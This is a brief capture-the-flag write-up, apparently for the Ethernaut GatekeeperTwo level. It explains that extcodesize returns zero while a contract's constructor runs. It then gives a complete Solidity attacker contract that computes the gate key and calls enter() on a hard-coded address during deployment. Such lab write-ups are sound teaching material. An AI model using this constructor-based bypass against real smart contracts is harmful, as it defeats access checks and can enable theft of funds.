• extcodesize opcode → address as input, returns code size of given address. It is used to define if an address belongs to EOA or contract. HOWEVER, it is not safe to use.
• A contract does not have source code during construction. For this reason, if a contract calls another contract during constructor method, it does not have a code yet.
• Rest is simple. Use below contract and attack during deployment.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

interface IGatekeeperTwo {
    function enter(bytes8 _gateKey) external returns (bool);
}

contract GatekeeperTwoAttacker {
    constructor() {
        bytes8 _gateKey = bytes8(uint64(bytes8(keccak256(abi.encodePacked(address(this))))) ^ type(uint64).max);
        IGatekeeperTwo(0x80c03FFbE18cA1C78B3e04906f0cCB53ccCBc14f).enter(_gateKey);   
    }
}